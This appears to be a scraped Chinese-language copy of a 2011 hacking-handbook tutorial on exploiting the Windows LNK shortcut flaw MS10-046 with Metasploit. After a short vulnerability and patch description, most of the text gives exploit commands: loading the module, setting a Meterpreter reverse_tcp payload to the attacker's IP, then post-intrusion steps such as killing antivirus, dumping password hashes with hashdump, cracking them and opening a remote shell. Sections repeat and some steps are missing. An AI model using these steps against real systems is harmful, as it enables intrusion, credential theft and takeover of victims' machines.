Metasploit Framework应用实例.docx
《Metasploit Framework应用实例.docx》由会员分享,可在线阅读,更多相关《Metasploit Framework应用实例.docx(22页珍藏版)》请在冰点文库上搜索。
![Metasploit Framework应用实例.docx](https://file1.bingdoc.com/fileroot1/2023-5/29/2c2b0f71-36e1-4f2b-af27-48ee4c1fc723/2c2b0f71-36e1-4f2b-af27-48ee4c1fc7231.gif)
MetasploitFramework应用实例
首页
技术频道
51CTO旗下网站
地图
社区:
论坛博客下载读书更多
登录注册
∙组网
∙安全
∙开发
∙数据库
∙服务器
∙系统
∙虚拟化
∙云计算
∙嵌入式
∙移动开发
∙51CTO.COM
∙CIO
∙WatchS
∙HC
∙灵客风LinkPhone
∙家园
∙微博
∙博客
∙论坛
∙下载
∙自测
∙门诊
∙周刊
∙读书
∙技术圈
∙知道
∙深信服下一代防火墙正式发布
∙开发WP7应用,赢“芒果”手机!
∙CIO谈高效企业---分享成功经验
∙中国客户使用的虚拟化方案
MetasploitFramework应用实例:
代码漏洞攻击
(1)
2011-06-1314:
56《BT4Linux黑客手册》51CTO.com我要评论()字号:
T|T
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
MicrosoftWindows快捷方式LNK文件自动执行代码漏洞攻击(MS10-046)
MetasploitFramework软件介绍及下载:
◆漏洞描述
1、漏洞定义
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。
这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。
默认下Windows启动了自动加载和自动播放功能,因此在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。
其他显示文件图标的应用也可用作这个漏洞的攻击载体。
受影响的Windows系统如下表1所示:
表1
漏洞名称
受影响的Windows系统类型
MS10-046
MicrosoftWindowsXPSP3
MicrosoftWindowsXPSP2
MicrosoftWindowsVistaSP2
MicrosoftWindowsVistaSP1
MicrosoftWindowsServer2008
MicrosoftWindowsServer2008SP2
MicrosoftWindowsServer2008R2
MicrosoftWindowsServer2003SP2
MicrosoftWindows7
2、关于补丁
Microsoft已经为此发布了一个安全公告(MS10-046)以及相应补丁:
MS10-046:
VulnerabilityinWindowsShellCouldAllowRemoteCodeExecution(2286198),其详细说明文档的链接如下:
此安全更新解决了WindowsShell中一个公开披露的漏洞。
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。
成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
除了使用Windows系统自带的自动更新来升级补丁外,也可以使用360安全卫士之类的第三方工具来实现。
首页
技术频道
51CTO旗下网站
地图
社区:
论坛博客下载读书更多
登录注册
∙组网
∙安全
∙开发
∙数据库
∙服务器
∙系统
∙虚拟化
∙云计算
∙嵌入式
∙移动开发
∙51CTO.COM
∙CIO
∙WatchS
∙HC
∙灵客风LinkPhone
∙家园
∙微博
∙博客
∙论坛
∙下载
∙自测
∙门诊
∙周刊
∙读书
∙技术圈
∙知道
∙深信服下一代防火墙正式发布
∙开发WP7应用,赢“芒果”手机!
∙CIO谈高效企业---分享成功经验
∙中国客户使用的虚拟化方案
首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章
窗体顶端
窗体底端
您所在的位置:
网络安全>安全工具>MetasploitFramework应用实例:
代码漏洞攻击
(2)
MetasploitFramework应用实例:
代码漏洞攻击
(2)
2011-06-1314:
56《BT4Linux黑客手册》51CTO.com我要评论()字号:
T|T
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
AD:
◆攻击操作
接下来,我们开始使用Metasploit3进行溢出攻击,下面为详细步骤。
步骤1:
进入Metasploit,载入攻击代码。
作为攻击者而言,首先是进入Metasploit。
除了从菜单上直接点选进入Metasploit外,我们也可以在图形界面下打开任意一个Shell,直接输入msfconsole命令来进入Metasploit。
如下图-1所示,可以看到当前包含代码数量、参数状态及最新版本等。
图-1
命令如下:
searchms10_046
回车后即可看到如下图-2所示的搜索结果,显示存在一个名为"ms10_046_shortcut_icon_dllloader"的可用攻击代码。
接下来,就可以载入该攻击代码,具体命令如下:
usewindows/browser/ms10_046_shortcut_icon_dllloader
回车后如下图所示,就载入了该攻击代码。
图-2
在使用一个攻击代码前,需要先查看其必需的设置参数有哪些,所以先要输入如下命令:
showoptions
回车后即可看到该攻击代码的设置参数,如下图-3所示,在图中间可以看到SRVHOST、SRVPORT、URIPATH这三个参数是必须的,其中,SRVPORT和URIPATH是已经默认设置好的。
图-3
首页
技术频道
51CTO旗下网站
地图
社区:
论坛博客下载读书更多
∙组网
∙安全
∙开发
∙数据库
∙服务器
∙系统
∙虚拟化
∙云计算
∙嵌入式
∙移动开发
∙51CTO.COM
∙CIO
∙WatchS
∙HC
∙灵客风LinkPhone
∙家园
∙微博
∙博客
∙论坛
∙下载
∙自测
∙门诊
∙周刊
∙读书
∙技术圈
∙知道
∙
∙
∙
∙
首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章
窗体顶端
窗体底端
您所在的位置:
网络安全>安全工具>MetasploitFramework应用实例:
代码漏洞攻击(3)
MetasploitFramework应用实例:
代码漏洞攻击(3)
2011-06-1314:
56《BT4Linux黑客手册》51CTO.com我要评论(0)字号:
T|T
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
AD:
步骤2:
在Metasploit3上配置攻击代码。
既然知道了必需的配置参数,接下来就可以使用set命令来依次配置参数。
其中,设置溢出有效载荷为反向溢出,而为了使用到Metasploit中的具备强化Shell功能的Meterpreter,所以设置为PAYLOAD为windows/metepreter/reverse_tcp此外,由于后面攻击者还要使用ettercap对目标进行DNS欺骗攻击,所以攻击者应要将反弹端口的目的地设置为自身IP,即设置LHOST为自身IP。
最后,使用exploit执行溢出。
具体命令如下:
set SRVHOST 攻击者自身IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 攻击者自身IP
exploit
依次输入回车后如下图-4所示,会显示为启用一个URL地址为http:
//10.23.0.3:
80,对应一个共享目录\\10.23.0.3\owhBPhxMJ\。
图-4
首页
技术频道
51CTO旗下网站
地图
社区:
论坛博客下载读书更多
∙组网
∙安全
∙开发
∙数据库
∙服务器
∙系统
∙虚拟化
∙云计算
∙嵌入式
∙移动开发
∙51CTO.COM
∙CIO
∙WatchS
∙HC
∙灵客风LinkPhone
∙家园
∙微博
∙博客
∙论坛
∙下载
∙自测
∙门诊
∙周刊
∙读书
∙技术圈
∙知道
∙
∙
∙
∙
首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章
窗体顶端
窗体底端
您所在的位置:
网络安全>安全工具>MetasploitFramework应用实例:
代码漏洞攻击(3)
MetasploitFramework应用实例:
代码漏洞攻击(3)
2011-06-1314:
56《BT4Linux黑客手册》51CTO.com我要评论(0)字号:
T|T
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
AD:
步骤2:
在Metasploit3上配置攻击代码。
既然知道了必需的配置参数,接下来就可以使用set命令来依次配置参数。
其中,设置溢出有效载荷为反向溢出,而为了使用到Metasploit中的具备强化Shell功能的Meterpreter,所以设置为PAYLOAD为windows/metepreter/reverse_tcp此外,由于后面攻击者还要使用ettercap对目标进行DNS欺骗攻击,所以攻击者应要将反弹端口的目的地设置为自身IP,即设置LHOST为自身IP。
最后,使用exploit执行溢出。
具体命令如下:
set SRVHOST 攻击者自身IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 攻击者自身IP
exploit
依次输入回车后如下图-4所示,会显示为启用一个URL地址为http:
//10.23.0.3:
80,对应一个共享目录\\10.23.0.3\owhBPhxMJ\。
图-4
首页
技术频道
51CTO旗下网站
地图
社区:
论坛博客下载读书更多
登录注册
∙组网
∙安全
∙开发
∙数据库
∙服务器
∙系统
∙虚拟化
∙云计算
∙嵌入式
∙移动开发
∙51CTO.COM
∙CIO
∙WatchS
∙HC
∙灵客风LinkPhone
∙家园
∙微博
∙博客
∙论坛
∙下载
∙自测
∙门诊
∙周刊
∙读书
∙技术圈
∙知道
∙深信服下一代防火墙正式发布
∙开发WP7应用,赢“芒果”手机!
∙CIO谈高效企业---分享成功经验
∙中国客户使用的虚拟化方案
首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章
窗体顶端
窗体底端
您所在的位置:
网络安全>安全工具>MetasploitFramework应用实例:
代码漏洞攻击(5)
MetasploitFramework应用实例:
代码漏洞攻击(5)
2011-06-1314:
56《BT4Linux黑客手册》51CTO.com我要评论()字号:
T|T
Windows支持使用快捷方式或LNK文件。
LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
AD:
步骤5:
入侵后在目标主机执行命令。
为了方便安全渗透测试人员可以更深入地研究漏洞的危害性,强化了的Meterpreter里也内置了大量的工具及命令。
举几个例子:
ps 列出当前运行的全部程序
如下图-12所示,输入ps回车后会显示出该Windows上当前运行的全部程序进程,攻击者将根据需要使用kill来杀掉某个进程,比如杀毒软件。
图-12
为了扩展一下思路,我们再来看看如何获取受害者主机上的密码Hash。
具体命令如下:
use priv 使用特权工具
hashdump 获取Windows所有用户密码Hash值
依次输入上述命令然后回车后就可看到如下图-13所示内容,攻击者成功地获取到了目标主机上的全部用户列表及对应的密码Hash表。
这个Hash表的内容只要导入Ophcrack之类的工具中就可以轻松地破解,而关于Ophcrack的具体使用大家可以参考本书的10.1节,这里就不再重复描述。
图-13
当然,可能有的朋友要说,在这个meterpreter里面很难输入Windows命令。
哦,是的,貌似是这样,但是没关系,我们可以很容易地解决这个小问题。
只要输入shell这个命令,攻击者就能够进入到目标主机的CMD界面中。
如下图-14所示,只需要驶入shell,回车后攻击者就可以进入到CMD的界面中,在这个界面里任何CMD下支持的命令都可以执行,比如使用ipconfig来显示当前IP地址。
如下图-14所示,我们确实看到当前IP显示为10.23.0.4,对,我们现在就在受害者的主机里。
至于添加账户之类的命令就由小黑们按照想法自行使用啦。
图-14
好了,到这里,Metasploit3的基本使用,我想大家都已经学会了。